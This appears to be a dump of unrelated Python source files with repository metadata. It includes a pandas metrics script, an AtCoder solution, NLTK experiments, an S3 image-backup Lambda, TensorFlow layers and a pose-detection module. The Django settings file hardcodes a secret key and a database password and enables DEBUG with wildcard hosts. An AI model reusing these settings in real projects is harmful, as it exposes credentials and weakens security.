if not os.path.exists(config_path): print("\nNo Config File: Using default config\n")
attrs = get_folder_attrs(fixture_path)
params = {k:v for k,v in attrs.iteritems() if k != 'root_files'}
filename = log_path + file_prefix + 'rootdir_attr.txt'
pd.Series(params, name='attributes').to_csv(filename, sep='\t')
print "Root Dir Attributes:"; print pd.Series(params, name='attributes')
return attrs
### Aggregation Calculations
def calc_agg_stats(df_units):
df_unit_counts = df_units.groupby('unit_name')['unit_status'].count()
df_mult_tests = df_unit_counts[df_unit_counts > 1].sort_values(ascending=False)
df_mult_failures = df_units[(df_units.unit_name.isin(df_mult_tests.index)) & (df_units.unit_status == 'FAIL')]
# aggregate statistics
n_units, n_tests = len(df_units.unit_name.unique()), len(df_units.unit_name)
n_units_mult_failures, n_mult_failures = (len(df_mult_tests), df_mult_tests.sum())
# executed tests that are passing and failing
n_pass_tests, n_fail_tests = df_units.unit_status.value_counts()
n_pass_tests_pct, n_fail_tests_pct = n_pass_tests/n_tests, n_fail_tests/n_tests
# there are some boards that show up both in pass and failure ('LB1537330100294')
# find the lastest timestamp and verify it must be a PASS to update true failure count
n_pass_units = len(df_units[df_units.unit_status=='PASS']['unit_name'].unique())
n_fail_units = len(df_units[df_units.unit_status=='FAIL']['unit_name'].unique())
pass_units = set(df_units[df_units.unit_status=='PASS']['unit_name'].unique())
fail_units = set(df_units[df_units.unit_status=='FAIL']['unit_name'].unique())
units_overlap = (pass_units & fail_units)
df_units_overlap = df_units[df_units.unit_name.isin(units_overlap)].sort_values(by='unit_name')
df_units_overlap = df_units_overlap.groupby('unit_name')[['date_record', 'unit_status']].max()
n_units_overlap = df_units_overlap[df_units_overlap.unit_status != 'PASS'].shape[0]
n_fail_units = n_fail_units - (len(units_overlap) - n_units_overlap)
n_pass_units_pct, n_fail_units_pct = n_pass_units/n_units, n_fail_units/n_units
# create a dict for processing
data_metrics = pd.Series({
'num_units': n_units, 'num_tests': n_tests,
'num_units_multiple_failures': n_units_mult_failures, 'num_tests_multiple_failures': n_mult_failures,
'num_pass_tests': n_pass_tests, 'num_fail_tests': n_fail_tests,
'num_pass_tests_pct': n_pass_tests_pct, 'num_fail_tests_pct': n_fail_tests_pct,
'num_pass_units': n_pass_units, 'num_fail_units': n_fail_units,
'num_pass_units_pct': n_pass_units_pct, 'num_fail_units_pct': n_fail_units_pct,
'num_units_overlapped_passfail': n_units_overlap
}).sort_values(ascending=False)
filename = log_path + file_prefix + 'status_metrics.txt'
write_log(filename, data_metrics, "\nUnit/Experimental Test Metrics:", log=True, format='pretty')
return data_metrics
def calc_agg_dated(df_units):
# date,hourly multi-index
df_agg_date_hourly = df_units.groupby(['date','hour'])['unit_name'].count()
df_agg_date_hourly.name = 'units_served'
df_agg_date_hourly.columns = ['units_served']
filename = log_path + file_prefix + 'units_served_datehourly.txt'
write_log(filename, df_agg_date_hourly, format='Pretty')
# hourly aggregations
df_stats_hourly = df_agg_date_hourly.reset_index()
df_agg_hourly = df_stats_hourly.groupby('hour')['units_served'].agg([np.mean, np.median, np.std], axis=1)
df_agg_hourly = pd.concat( [ df_units.groupby('hour')['unit_name'].count(), df_agg_hourly], axis=1 )
df_agg_hourly.columns = ['count','average', 'median', 'std']
filename = log_path + file_prefix + 'units_served_hourly_stats.txt'
write_log(filename, df_agg_hourly, header=['Count', 'Average', 'Median', 'Std'])
# hourly summary statistics
ds_agg_summary = pd.Series({
'mean': df_agg_hourly['count'].mean(),
'median': df_agg_hourly['count'].median(),
'std': df_agg_hourly['count'].std()}, name='units_served_hourly')
filename = log_path + file_prefix + 'units_served_hourly_summary.txt'
write_log(filename, ds_agg_summary, header=["Units Served Hourly"])
s = "Units Served Hourly:\nMean: {0:.2f}, Median: {1:.2f}, STD: {2:.2f}"
print s.format(df_agg_hourly['count'].mean(), df_agg_hourly['count'].median(), df_agg_hourly['count'].std())
return ds_agg_summary
def calc_agg_failures(ds, datapath):
filepath = datapath + ds.unit_status + "/" + "".join(ds.date.strftime('%Y%m%d')) + "/"
filename = filepath + ds.file_name + ds.date_record.strftime('_%Y%m%d_%H%M%S') + '.csv'
df = pd.read_csv(filename)
# extract test failures for a given failure and append to
df_fail = df[(df.STATUS == 1) | (df.VALUE == 'FAIL')]
df_test_failures = df_fail.groupby('TEST')['VALUE'].count()
# keep track of occuring failures
return df_test_failures
### Configuration Aggregations
def define_default_configs():
return [
{'name': 'voltagedefault', 'prefix': ['V'], 'pattern': ['BOLT', 'PWR']}
]
def match(frame, start_cond, pattern_cond):
# define regex patterns
pattern_regex = "|".join([p for p in pattern_cond])
start_regex = "|".join([p for p in start_cond])
start_regex = "^("+ start_regex +")"
# create series
df_flt = frame[(frame.TEST.str.contains(pattern_regex)) | (frame.TEST.str.contains(start_regex))]
df_flt = df_flt.reset_index()
df_flt = df_flt[['TEST','VALUE']].T
df_flt.columns = [df_flt.ix['TEST']]
df_flt = df_flt.drop('TEST', axis=0).reset_index().drop('index',axis=1)
return df_flt
def match_config_patterns(ds, datapath, name, start_cond, pattern_cond):
filepath = datapath + ds.unit_status + "/" + "".join(ds.date.strftime('%Y%m%d')) + "/"
filename = filepath + ds.file_name + ds.date_record.strftime('_%Y%m%d_%H%M%S') + '.csv'
df = pd.read_csv(filename)
df_patterns = match(df, start_cond, pattern_cond)
return pd.Series( {k:v.values[0] for k,v in dict(df_patterns).iteritems()} )
def calc_agg_config(frame, datapath, name, start_cond, pattern_cond):
params = (name, start_cond, pattern_cond)
df_agg_config = frame.apply(lambda x: match_config_patterns(x, datapath, *params), axis=1).astype('float')
# calculate aggregations
iqr = (df_agg_config.dropna().quantile(0.75, axis=0) - df_agg_config.dropna().quantile(0.25, axis=0))
df_metric = pd.concat([df_agg_config.mean(axis=0), df_agg_config.median(axis=0), df_agg_config.std(axis=0),
iqr, df_agg_config.min(axis=0), df_agg_config.max(axis=0)], axis=1)
df_metric.columns = ['mean', 'median', 'std', 'iqr', 'min', 'max']
df_metric.name = name
# save to log file
filename = log_path + file_prefix + name + '_stats.txt'
write_log(filename, df_metric, header=["Failure Counts"], format='pretty')
return df_metric
### Plots/Visualizations
def plot_units_metrics(metrics, titles):
fig, (ax1,ax2,ax3) = plt.subplots(1,3, figsize=(20,7))
for data,title,axi in zip(metrics, titles, (ax1,ax2,ax3)):
sns.barplot(data, data.index, ax=axi)
axi.set_title(title, fontsize=16, fontweight='bold')
for tick in axi.yaxis.get_major_ticks():
tick.label.set_fontsize(14)
tick.label.set_fontweight('bold')
for tick in axi.xaxis.get_major_ticks():
tick.label.set_fontsize(14)
tick.label.set_fontweight('bold')
fig.set_tight_layout(True)
plt.savefig(image_path + file_prefix + 'units_status_metrics.png')
def plot_units_dailyhour(df_units):
# units per hour tested
fig = plt.figure(figsize=(14,6))
df_units['date'] = df_units.date_record.dt.date
df_units['hour'] = df_units.date_record.dt.hour
df_units_dated = df_units.groupby(['date','hour'])['unit_name'].count()
df_units_dated.unstack(level=0).plot(kind='bar', subplots=False)
plt.ylabel("Num Units Tested", fontsize=10, fontweight='bold')
plt.xlabel("Hour", fontsize=10, fontweight='bold')
plt.title("Distribution per number of units tested", fontsize=13, fontweight='bold')
fig.set_tight_layout(True)
plt.savefig(image_path + file_prefix + 'units_tested_datehour.png')
def plot_units_hourly(df_units):
fig = plt.figure(figsize=(14,6))
df_agg_hourly = df_units.groupby(['hour'])['unit_name'].count()
df_agg_hourly.plot(kind='bar')
plt.ylabel("Num Units Tested", fontsize=10, fontweight='bold')
plt.xlabel("Hour", fontsize=10, fontweight='bold')
plt.title("Hourly Distribution per number of units tested", fontsize=10, fontweight='bold')
fig.set_tight_layout(True)
plt.savefig(image_path + file_prefix + 'units_tested_hourly.png')
def plot_failure_metrics(frame):
fig = plt.figure(figsize=(14,6))
sns.barplot(frame, frame.index)
for tick in plt.gca().yaxis.get_major_ticks():
tick.label.set_fontsize(8)
tick.label.set_fontstyle('italic')
tick.label.set_fontweight('bold')
plt.xlabel('Number of Failures', fontsize=10, fontweight='bold')
plt.title("Failure Test Types Distribution", fontsize=10, fontweight='bold')
fig.set_tight_layout(True)
plt.savefig(image_path + file_prefix + 'units_failure_metrics.png')
### Logging
def write_log(filename, frame, header=None, log=False, format=None):
if format:
with open(filename, 'w') as f: f.write(frame.__repr__())
if log: print header; print (frame); print
else:
frame.to_csv(filename, sep='\t', float_format='%.2f', header=header)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Factory Unit Metrics')
parser.add_argument('-f', '--fixture', default='fixture', nargs='?', help='default=fixture')
args = parser.parse_args()
curr_date = "".join( str(datetime.now().date()).split("-") )
fixture_path = args.fixture + '/'
data_path = fixture_path + 'data/'
log_path = fixture_path + 'logs/' + curr_date + '/'
image_path = fixture_path + 'images/' + curr_date + '/'
config_path = fixture_path + 'config/'
file_prefix = args.fixture.split("/")[-1] + '_'
root_fixture_path = fixture_path if fixture_path.startswith('/') else os.getcwd() + '/' + fixture_path
root_data_path = data_path if fixture_path.startswith('/') else os.getcwd() + '/' + data_path
# create folder structure if necessary, create tabular dataframe format
attrs = create_dir_structure()
meta_folders = ['logs', 'images', 'config']
meta_path = '[' + '|'.join(meta_folders) + ']'
data_folders = filter(lambda x: x not in meta_folders, attrs['root_dirs'])
data = [extract_subfolder_data(dir_name, root_fixture_path) for dir_name in attrs['root_dirs']]
data_dict = {k: v for d in data for k, v in d.items() if not re.compile(meta_path).search(k)}
df_aggunits = create_units(data_dict, root_data_path)
# Apply Core Aggregations, Log to Files
ds_metrics = calc_agg_stats(df_aggunits).sort_values(ascending=False)
ds_metrics_summary = calc_agg_dated(df_aggunits)
ds_failures = df_aggunits.apply(lambda x: calc_agg_failures(x, data_path), axis=1)
ds_failures = ds_failures.sum().astype(int)
ds_failures = ds_failures.drop('OVERALL_TEST_RESULT', axis=0).sort_values(ascending=False)
filename = log_path + file_prefix + 'testfailuretype_stats.txt'
write_log(filename, ds_failures[:10], header="\nTop 10 Failure Test Types", log=True, format='pretty')
# Apply Configuration Aggregations, Log to Files
if os.path.exists(config_path):
with open(config_path + 'config.json') as f:
config_json = json.load(f)
config_tests = config_json['tests']
else:
config_tests = define_default_configs()
for config in config_tests:
params = (config['name'], config['prefix'], config['pattern'])
calc_agg_config(df_aggunits, data_path, *params)
# Apply Plots
ds_metrics_units = ds_metrics.ix[['num_units', 'num_pass_units', 'num_fail_units',
'num_units_multiple_failures', 'num_units_overlapped_passfail']]
ds_metrics_tests = ds_metrics.ix[['num_tests', 'num_pass_tests',
'num_fail_tests','num_tests_multiple_failures']]
ds_metrics_pct = ds_metrics.ix[['num_pass_units_pct', 'num_pass_tests_pct',
'num_fail_tests_pct', 'num_fail_units_pct']]
plot_units_metrics((ds_metrics_units, ds_metrics_tests, ds_metrics_pct.sort_values(ascending=False)),
("Unit Metrics", "Pass/Failure Counts", "Pass/Fail Test Percentages"))
plot_units_dailyhour(df_aggunits)
plot_units_hourly(df_aggunits)
plot_failure_metrics(ds_failures)
| [
"akamlani@gmail.com"
] | akamlani@gmail.com |
91e13a948d4043377389cee8b22692d079ff2ca0 | 132dee8451b3b3579feb52bae0a061dedfb0f9ba | /tessoku-book/A02/main.py | 61396967e92235846704caf46740671b2980458e | [] | no_license | huyu398/AtCoder | c4f9325ec0055f44b43210b3150f7eaaf4005a68 | c94c07d80ac055f94e2b9f70f6340c7262833c6d | refs/heads/master | 2023-04-29T07:42:12.508447 | 2023-04-22T16:32:06 | 2023-04-22T16:32:06 | 205,974,681 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 708 | py | #!/usr/bin/env python3
import sys
YES = "Yes" # type: str
NO = "No" # type: str
def solve(N: int, X: int, A: "List[int]"):
print(YES if X in A else NO)
return
# Generated by 2.12.0 https://github.com/kyuridenamida/atcoder-tools (tips: You use the default template now. You can remove this line by using your custom template)
def main():
def iterate_tokens():
for line in sys.stdin:
for word in line.split():
yield word
tokens = iterate_tokens()
N = int(next(tokens)) # type: int
X = int(next(tokens)) # type: int
A = [int(next(tokens)) for _ in range(N)] # type: "List[int]"
solve(N, X, A)
if __name__ == '__main__':
main()
| [
"huyu.sakuya4645@gmail.com"
] | huyu.sakuya4645@gmail.com |
9153e9b835d0f7030a7cc13f8e87258d396f0dd6 | 167daddd0e4f4562de7cbf0150e56c7154d6c474 | /sketch_nltk.py | 264633dc0b6d42f3b3af419fde5e9667a11fe661 | [] | no_license | vikranth22446/instagraders | 0d4fa9155075207cd59bed22e5518c1512d6c780 | 7a8a0e47e989cf6a2bc38f20b248fb9dab4b82e4 | refs/heads/master | 2021-04-15T09:29:52.374456 | 2018-03-25T15:16:56 | 2018-03-25T15:16:56 | 126,655,700 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,473 | py | from itertools import product
import nltk
from nltk import PunktSentenceTokenizer
from nltk.corpus import stopwords, state_union, wordnet, wordnet_ic
from nltk.tokenize import word_tokenize
from nltk.stem import PorterStemmer
ps = PorterStemmer()
example_sentence = "This is an example off stopping word filteration"
stoplist = set(stopwords.words("english"))
filtered_words = [ps.stem(w) for w in word_tokenize(example_sentence) if w not in stoplist]
print(filtered_words)
def get_pps():
custom_sent_tokenizer = PunktSentenceTokenizer(sample_token)
sample_token = state_union.raw("2005-GWBush.txt")
real = state_union.raw("2005-GWBush.txt")
tokenized = custom_sent_tokenizer.tokenize(real)
try:
for i in tokenized:
words = nltk.word_tokenize(i)
tagged = nltk.pos_tag(words)
namedEntity = nltk.ne_chunk(tagged, binary=True)
namedEntity.draw()
print(tagged)
except Exception:
print("e")
def get_syns(word):
synomys = []
antonyms = []
for syn in wordnet.synsets(word):
for l in syn.lemmas():
synomys.append(l.name)
if l.antonyms():
antonyms.append(l.antonyms()[0].name())
print(synomys)
print(antonyms)
return synomys
# u = set.intersection(set("love"), set(get_syns("romance")))
# print(u)
#
# cars = wordnet.synsets("car", "n")
# bikes = wordnet.synsets("bike", "n")
#
# brown_ic = wordnet_ic.ic("ic-brown.dat")
# semcor_ic = wordnet_ic.ic("ic-semcor.dat")
#
# for car in cars:
# for bike in bikes:
# jcs_brown = car.jcn_similarity(bike, brown_ic)
# jcs_semcor = car.jcn_similarity(bike, semcor_ic)
# print("JCS(%s, %s) = (%.4f, %.4f)" %
# (str(car), str(bike), jcs_brown, jcs_semcor))
# get_syns()
#
# actual = wordnet.synsets('worse')[0]
# predicted = wordnet.synsets('better')[0]
# similarity = actual.jcn_similarity(actual, predicted)
# print(similarity)
# #
# from itertools import product
#
love = wordnet.synsets('dog')[0].definition()
hatred = wordnet.synsets('cheese')[0].definition()
import spacy
import spacy
nlp = spacy.load("en")
tokens = nlp("love")
tokens2 = nlp("romance")
print(tokens.similarity(tokens2))
# for token1 in tokens:
# for token2 in tokens:
# print(token1.similarity(token2))
# print(love)
# print(hatred)
# nlp = spacy.load('en')
# doc1 = nlp("dog")
# doc2 = nlp("cheese")
# print(doc1.similarity(doc2))
# allsyns1 = set(ss for word in ["hatred"] for ss in wordnet.synsets(word))
# allsyns2 = set(ss for word in ["sticks"] for ss in wordnet.synsets(word))
# best = max((wordnet.wup_similarity(s1, s2) or 0, s1, s2) for s1, s2 in
# product(allsyns1, allsyns2))
# print(best)
# (0.9411764705882353, Synset('command.v.02'), Synset('order.v.01'))
# allsyns1 = set(ss for ss in wordnet.synsets("good"))
# allsyns2 = set(ss for ss in wordnet.synsets("bad"))
# best = max((wordnet.wup_similarity(s1, s2) or 0, s1, s2) for s1, s2 in
# product(allsyns1, allsyns2))
# print(best)
# (0.9411764705882353, Synset('command.v.02'), Synset('order.v.01'))
# from nltk.corpus import wordnet as wn
# from nltk.corpus import wordnet_ic
#
# cars = wordnet.synset("romance.n.01")
# bikes = wordnet.synset("love.n.01")
#
# brown_ic = wordnet_ic.ic("ic-brown.dat")
# semcor_ic = wordnet_ic.ic("ic-semcor.dat")
# jcs_brown = cars.jcn_similarity(bikes, brown_ic)
# jcs_semcor = cars.jcn_similarity(bikes, semcor_ic)
# print("JCS(%s, %s) = (%.4f, %.4f)" %
# (str(cars), str(bikes), jcs_brown, jcs_semcor))
# w1 = wordnet.synsets("greater", pos="a")[0]
# w2 = wordnet.synsets("worse", pos="a")[0]
# print(w1, w2)
# print(w1.wup_similarity(w2))
# import nltk, string
# from sklearn.feature_extraction.text import TfidfVectorizer
#
# nltk.download('punkt') # if necessary...
#
# stemmer = nltk.stem.porter.PorterStemmer()
# remove_punctuation_map = dict((ord(char), None) for char in string.punctuation)
#
#
# def stem_tokens(tokens):
# return [stemmer.stem(item) for item in tokens]
#
#
# '''remove punctuation, lowercase, stem'''
#
#
# def normalize(text):
# return stem_tokens(nltk.word_tokenize(text.lower().translate(remove_punctuation_map)))
#
#
# vectorizer = TfidfVectorizer(tokenizer=normalize, stop_words='english')
#
#
# def cosine_sim(text1, text2):
# tfidf = vectorizer.fit_transform([text1, text2])
# return ((tfidf * tfidf.T).A)[0, 1]
#
#
# print(cosine_sim(love, hatred))
| [
"rama22446@gmail.com"
] | rama22446@gmail.com |
84f4ac81c70027de06bdc88e00596f7f7a3f14cf | f93dd06552ee4723aa89374a970f84c37b75d0d3 | /helpme/settings.py | 9da51704a77be82dff0df287964d4d06ca31c461 | [] | no_license | prashntt/helpme | af3afb77120c1e23477fb9f16a1842c962f474a5 | c6f8376697e682f6e956580ca885c7ddb11fb93a | refs/heads/master | 2020-04-18T18:17:06.933453 | 2019-02-02T14:50:40 | 2019-02-02T14:50:40 | 167,679,125 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,477 | py | """
Django settings for helpme project.
Generated by 'django-admin startproject' using Django 1.11.15.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'nj^ga_%!nwd6w2txy7vr@$j2%mo896kc7#y72(&q6x&k_*e8&&'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'construction',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'helpme.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['construction'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'helpme.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
"""
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
"""
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'django_project',
'USER': 'postgres',
'PASSWORD': 'Administrator',
'HOST': os.environ['POSTGRESQL_SERVICE_HOST'],
'PORT': os.environ['POSTGRESQL_SERVICE_PORT'],
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
LOGIN_REDIRECT_URL = 'home'
| [
"prashantupadhyay1020@gmail.com"
] | prashantupadhyay1020@gmail.com |
a38fb69ca2e13a0b02c9086e4b606e71e89e12af | 9e68a08ae6a384e7596f253129555119c8139dd5 | /scripts/backup_hatenafotolife/backup_hatenafotolife.py | f336ddcb97bd65799b2fdef29d4edaf49a11374d | [] | no_license | yoheia/yoheia | 28446a20a12c00c7d01851ad72c1d0c203ed958e | 46dd39ac9b162e8716bffb4dcc306f7943308252 | refs/heads/master | 2022-08-20T06:49:36.160426 | 2022-07-20T22:12:16 | 2022-07-20T22:12:16 | 249,028 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 733 | py | # -*- coding: utf-8 -*-
import os
import re
import boto3
import urllib2
from bs4 import BeautifulSoup
def lambda_handler(event, context):
target_uri= 'http://f.hatena.ne.jp/yohei-a/rss'
s3_bucket_name = 'hatenafotolife'
work_dir = '/tmp'
html = urllib2.urlopen(target_uri)
soup = BeautifulSoup(html, 'html.parser')
s3 = boto3.client('s3')
for item in soup.find_all("hatena:imageurl"):
img_uri = item.contents[0]
img_filename = os.path.basename(img_uri)
r = urllib2.urlopen(img_uri)
f = open(work_dir + '/' + img_filename, "wb")
f.write(r.read())
r.close()
f.close()
s3.upload_file(work_dir + '/' + img_filename, s3_bucket_name, img_filename)
return 1
| [
"yohei.az@gmail.com"
] | yohei.az@gmail.com |
17070b67e50ec67597e3d5cfb695a3a57b0f538e | 2f9fe1be686ed1765e74c01d8f771e4d1c0e9d0f | /users/views.py | 1cf736953fb478815157111d269bcf9dc9fd5b4e | [] | no_license | nexto123/music-app | 524210faaf0c6fa9e0d6719e82cf68971f003808 | fa66539895f853283c89646a78790f915e3c25e7 | refs/heads/master | 2022-12-16T21:25:57.728861 | 2019-10-12T08:33:32 | 2019-10-12T08:33:32 | 202,499,272 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,263 | py | from django.urls import reverse_lazy, reverse
from django.http import request
from allauth.account.signals import user_signed_up
from django.shortcuts import render, get_object_or_404, redirect
from .models import UserProfile, CustomUser
from bucket.settings import AUTH_USER_MODEL
from django.views.generic import (TemplateView, ListView,
DetailView, CreateView,
UpdateView, DeleteView)
from .forms import CustomUserCreationForm, UserProForm
from django.contrib import messages
##To send a message to a view ."example is : messages.error(request,'your bla bla bla')"
#Obselete not in use now
class SignUpView(CreateView):
form_class = CustomUserCreationForm
success_url = reverse_lazy('login')
template_name = 'account/signup.html'
#Detail Views
# class ProfileDetailView(DetailView):
# model = UserProfile
class UserProfileUpdateView(UpdateView):
model = UserProfile
template_name_suffix = '_update_form'
form_class = UserProForm
# fields = ('display_name','description', 'website', 'phone', 'country', 'county', 'image', 'created_date')
redirect_field_name = '/'
def get_queryset(self):
return UserProfile.objects.all()
| [
"pristowel@gmail.com"
] | pristowel@gmail.com |
dc4cd84593aa25971075c2cfbd4507bf03bd428e | b8249860b2d4c41d39cab4106fc15aedbbf7b0e8 | /components/layers.py | 6137637bb2aaa7775b50087431e9d7afd9faaba9 | [
"MIT"
] | permissive | serre-lab/visreasoning | b5ef3c5af8ac9cfeef016411e917e97a154d0712 | b84bfbb7d5c2290356f717a966f815f68be7c3c4 | refs/heads/master | 2021-09-10T11:00:31.136282 | 2018-03-25T02:43:40 | 2018-03-25T02:43:40 | 125,939,508 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 3,754 | py | import tensorflow as tf
import numpy as np
from components import component
from operator import mul
# NOTE: input_size and output_size exclude batch dimension but the actual input and output must have batch dimension as its first dim.
class BaseLayer(component.UniversalComponent):
"""
Contains variables and operations common to all layers. Sets attributes, checks for inconsistencies, builds variable list.
"""
def __init__(self, name, input_size, batch_size=1, trainable=True):
"""
Inputs:
name : (str) layer name
input_size : (list) dimensions of layer input [height, width, channels]
batch_size : (int) batch size
trainable : (bool) If true, layer weights can be updated duirng learning.
"""
self.name = name # must be a string
self.input_size = input_size # must be a list (height-width-inchannels)
self.output_size = None
self.batch_size = batch_size # must be an int
self.output = None
self.trainable = trainable
if not isinstance(self.name, str):
raise TypeError("BaseLayer: name should be string.")
if not isinstance(self.input_size, list):
raise TypeError("BaseLayer: input_size should be a list of ints.")
elif not len(self.input_size) == 3:
raise ValueError("BaseLayer: input_size should be shaped like height-width-inchannels.")
else:
for idim in range(len(self.input_size)):
if not isinstance(self.input_size[idim], int):
raise TypeError("BaseLayer: input_size should be a list of ints.")
if not (isinstance(self.batch_size, int) and self.batch_size > 0):
raise TypeError("BaseLayer: batch_size should be a positive int.")
def run(self, X):
"""
Checks to see if current input is properly shaped.
Inputs :
X : (tensor) an input tensor of size [batch_size] + self.input_size
"""
if '1.0' in tf.__version__:
if not X.shape.as_list()[1:] == self.input_size:
raise TypeError("BaseLayer: input (X) has different shape (excluding batch) than input_size.")
def get_variables(self):
"""
Builds variable list
"""
var_list = []
if hasattr(self, 'weights'):
var_list = var_list + [self.weights]
if hasattr(self, 'biases'):
var_list = var_list + [self.biases]
return var_list
class AttentionLayer(BaseLayer):
"""
Abstract attentional layer. Super-object for spatial and feature attention layers. Sets mask size and output size.
"""
def initialize_vars(self):
"""
Sets output size and mask.
"""
self.output_size = self.input_size
self.mask = tf.ones([self.batch_size] + self.input_size, dtype=tf.float32) / reduce(mul, self.input_size)
def run(self, X):
"""
Checks input size and multiplies mask with input.
Inputs :
X : (tensor) input tensor of size [batch_size] + self.input_size
"""
super(AttentionLayer, self).run(X)
output = tf.multiply(X, self.mask, name=self.name + '_out')
if '1.0' in tf.__version__:
if not output.shape.as_list()[1:] == self.output_size:
raise TypeError(
"AttentionLayer: output (Y) has different shape (excluding batch) than input_size. Could be a bug in implementation.")
return output
def set_batch_size(self, batch_size):
"""
Sets batch size.
Inputs :
batch_size : (int) batch_size
"""
super(AttentionLayer, self).set_batch_size(batch_size)
self.initialize_vars()
| [
"junkyungkim@Snowboard.fios-router.home"
] | junkyungkim@Snowboard.fios-router.home |
e5563aa8e1c6380c3100808977ba86c702e04ada | afe1810e565dbf7832a1f9b58f314a485f5df82a | /Flow control.py | edf8ef117b54eb1fc8112e55c8a7c367aae604f1 | [] | no_license | sriramv95/Python-Programming | e601ddfbaf4cddd6abc0bdcfa71336fcf1acbabb | 96da7e57ad134c8bb9519f5fc4304b860178d728 | refs/heads/master | 2022-11-18T20:06:18.610644 | 2020-07-15T03:56:15 | 2020-07-15T03:56:15 | 279,757,340 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,184 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Jan 29 08:55:04 2020
@author: Sriram
"""
# =============================================================================
# Flow control statement
# =============================================================================
# if
# while
# for
# while statement is used to execute set of statements while conditions is true
# syntax
# while (condition):
# python statements1
# else:
# python statements2
# other statements
time = 9
while(time < 12):
print("Good Morning")
time+= 1
else:
print("Good Afternoon")
#write python function to find the number of times i
def times(num):
count = 0
while(num <= 100):
count+=1
num+= 10
return count;
times(50)
# for loop is used to define given set of statements for one time for each value
# in the collection
# for i in the collection:
# python statemnts
for i in [9,10,11,12]:
print (i)
print("Good morning")
# write python functin to find the value after adding 10 to the user give value 5 times
def num(x,tim = 5):
count = tim
for i in range(count):
x+= 10
return x;
num(50)
num(50,6)
# how to decide which loop we have to use given problem
# Case1 : write python to find the value if I have to save 52/- per week - for loop
def SAV(x):
count = 0
for i in range(x, 0, -52):
count+= 1
else:
print("Number of weeks:",count - 1)
SAV(10000000)
# OR
def SAVA(x):
week = x // 52
weeks = int(week)
print("Number of weeks:",weeks)
SAVA(1000)
# case 2 : write python function to find the total number of weeks it will take to make
# 5000
def SAV2(x):
count = 0
while x < 5000:
x = x + 52
count+= 1
else:
print("Number of weeks:",count - 1)
print("Final x value:",x - 52)
SAV2(0)
# OR
def SAVA(x):
week = x // 52
weeks = int(week)
print("Number of weeks:",weeks)
SAVA(5000)
# Flow control statements
# Break
# Continue
# Pass | [
"noreply@github.com"
] | sriramv95.noreply@github.com |
ba7ee657e0649c6c2ae706947a88abeaa7aa9ff2 | 11544ca256de12c14b437715ec275788d59b359f | /poseModule.py | fd43fcb614ee4b68df507218c4e6d0660a1b5c41 | [
"MIT"
] | permissive | watcharabulsak/FastDOC_Prudential_Project | f3420de385465eeaf9971fd0b98a3745e20594ec | e5b5e164d6a7029cabf3b2e5827d18d255b8aa45 | refs/heads/main | 2023-05-08T01:23:56.546485 | 2021-05-30T09:12:36 | 2021-05-30T09:12:36 | 372,151,617 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,192 | py | import cv2
import mediapipe as mp
import time
import math
import numpy as np
class poseDetector():
def __init__(self, mode = False, upBody =False, smooth = True, detectionCon= 0.5, trackCon = 0.5):
self.mode = mode
self.upBody = upBody
self.smooth = smooth
self.detectionCon = detectionCon
self.trackCon = trackCon
self.mpDraw = mp.solutions.drawing_utils
self.mpPose = mp.solutions.pose
self.pose = self.mpPose.Pose(self.mode, self.upBody, self.smooth, self.detectionCon, self.trackCon)
def findPose(self, img, draw = True):
imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
self.results = self.pose.process(imgRGB)
if self.results.pose_landmarks:
if draw:
self.mpDraw.draw_landmarks(img, self.results.pose_landmarks, self.mpPose.POSE_CONNECTIONS)
return (img)
def findPosition(self, img, draw = True):
self.lmList = []
